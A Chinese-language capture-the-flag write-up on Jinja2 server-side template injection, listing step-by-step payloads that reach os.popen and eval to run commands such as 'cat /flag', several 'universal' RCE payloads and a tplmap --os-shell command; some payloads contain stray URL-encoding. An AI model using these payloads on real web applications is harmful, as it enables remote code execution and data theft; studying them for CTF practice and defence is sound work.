发现提示!,模板注入无疑了
验证一下
寻找object基类
{
{
"".__class__.__bases__}}
或 {
{
"".__class__.__mro__}}
找到os方法 利用object类
{
{
"".__class__.__mro__[1].__subclasses__()[117]}}
用.init.globals查找os,init初始化类,globals全局查找方法变量参数
{
{
"".__class__.__mro__[1].__subclasses__()[117].__init__.__globals__}}
利用其中的popen查找可读取文件(注意这里的斜杠表示下一级目录,加与不加是不同的路径)
{
{
"".__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('dir /').read()}}
找到flag
{
{
"".__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('cat /flag').read()}}
成功找到
嫌麻烦?tplmap值得你拥有。
https://github.com/epinna/tplmap
python tplmap.py -u “url+?name=” --os-shell
初学者建议手动注入,根据不同环境调试。
官方利用payload
{
% for c in [].__class__.__base__.__subclasses__() %}
{
% if c.__name__ == 'catch_warnings' %}
{
% for b in c.__init__.__globals__.values() %}
{
% if b.__class__ == {
}.__class__ %}
{
% if 'eval' in b.keys() %}
{
{
b['eval']('__import__("os").popen("id").read()') }}
{
% endif %}
{
% endif %}
{
% endfor %}
{
% endif %}
{
% endfor %}
大佬payload
{
{
config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}
1.
构造jinjia2 ssti的命令执行payload
{
% for c in [].__class__.__base__.__subclasses__() %}{
% if c.__name__=='catch_warnings' %}{
{
c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{
% endif %}{
% endfor %}
2.
这里用的到Payload是一个Jinjia2模板引擎通用的RCE Payload:
{
% for c in [].__class__.__base__.__subclasses__() %}{
% if c.__name__=='catch_warnings' %}{
{
c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{
% endif %}{
% endfor %}
3.
payload:看一下根目录,回显了flag在这根目录
{
% for c in [].__class__.__base__.__subclasses__() %}{
%if%20c.__name__=='catch_warnings'%27'%}{
{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{
%endif%}{
% endfor %}
查看flag
{
% for c in [].__class__.__base__.__subclasses__() %}{
%if%20c.__name__=='catch_warnings'%27'%}{
{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}{
%endif%}{
% endfor %}
https://blog.csdn.net/SopRomeo/article/details/105123395?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522158562310619724845002506%2522%252C%2522scm%2522%253A%252220140713.130056874…%2522%257D&request_id=158562310619724845002506&biz_id=0&utm_source=distribute.pc_search_result.none-task
https://blog.csdn.net/qq_40648358/article/details/105011659?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522158562310619724845002506%2522%252C%2522scm%2522%253A%252220140713.130056874…%2522%257D&request_id=158562310619724845002506&biz_id=0&utm_source=distribute.pc_search_result.none-task
https://blog.csdn.net/qq_40827990/article/details/82940894
https://blog.csdn.net/zz_Caleb/article/details/96480967